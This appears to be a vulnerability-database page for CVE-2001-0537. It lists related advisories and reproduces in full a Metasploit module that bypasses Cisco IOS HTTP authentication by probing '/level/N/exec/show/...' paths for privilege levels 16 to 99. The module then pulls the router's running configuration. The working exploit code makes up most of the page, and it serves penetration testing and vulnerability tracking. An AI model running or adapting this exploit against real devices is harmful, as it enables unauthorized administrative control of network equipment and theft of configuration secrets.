| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2001-0537 | 29 May 201815:50 | – | circl | |
| IOS HTTP Authorization Vulnerability | 27 Jun 200115:00 | – | cisco | |
| IOS HTTP Authorization Vulnerability - Cisco Systems | 1 Sep 201000:00 | – | nessus | |
| Cisco IOS HTTP Configuration Unauthorized Administrative Access | 2 Jul 200100:00 | – | nessus | |
| Cisco IOS HTTP Authentication Bypass - Ver2 (CVE-2001-0537) | 3 Mar 201400:00 | – | checkpoint_advisories | |
| CVE-2001-0537 | 9 Mar 200205:00 | – | cve | |
| CVE-2001-0537 | 9 Mar 200205:00 | – | cvelist | |
| Exploit for CVE-2000-0114 | 30 Jul 202413:29 | – | gitee | |
| Cisco IOS HTTP Unauthorized Administrative Access | 10 Dec 201005:47 | – | metasploit | |
| Cisco IOS HTTP Configuration - Authentication Bypass | 1 Jun 202605:38 | – | nuclei |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
# Include Cisco utility methods
include Msf::Auxiliary::Cisco
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Cisco IOS HTTP Unauthorized Administrative Access',
'Description' => %q{
This module exploits a vulnerability in the Cisco IOS HTTP Server.
By sending a GET request for "/level/num/exec/..", where num is between
16 and 99, it is possible to bypass authentication and obtain full system
control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module
tested successfully against a Cisco 1600 Router IOS v11.3(11d).
},
'Author' => [ 'aushack', 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '2936'],
[ 'CVE', '2001-0537'],
[ 'OSVDB', '578' ],
],
'DisclosureDate' => '2001-06-27'))
end
def run_host(ip)
16.upto(99) do |level|
res = send_request_cgi({
'uri' => "/level/#{level}/exec/show/version/CR",
'method' => 'GET'
}, 20)
if res and res.body and res.body =~ /Cisco Internetwork Operating System Software/
print_good("#{rhost}:#{rport} Found vulnerable privilege level: #{level}")
report_vuln(
{
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => self.name,
:sname => ssl ? "https" : "http",
:info => "Module #{self.fullname} successfully accessed http://#{rhost}:#{rport}/level/#{level}/exec/show/version/CR",
:refs => self.references,
:exploited_at => Time.now.utc
}
)
res = send_request_cgi({
'uri' => "/level/#{level}/exec/show/config/CR",
'method' => 'GET'
}, 20)
if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)<\/FORM>/mi
config = $2.strip
print_good("#{rhost}:#{rport} Processing the configuration file...")
cisco_ios_config_eater(rhost, rport, config)
report_exploit(
{
:host => rhost,
:port => rport,
:name => self.name,
:sname => ssl ? "https" : "http",
:info => "Module #{self.fullname} successfully captured the configuration file:\n#{config}"
}
)
else
print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
end
break
end
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation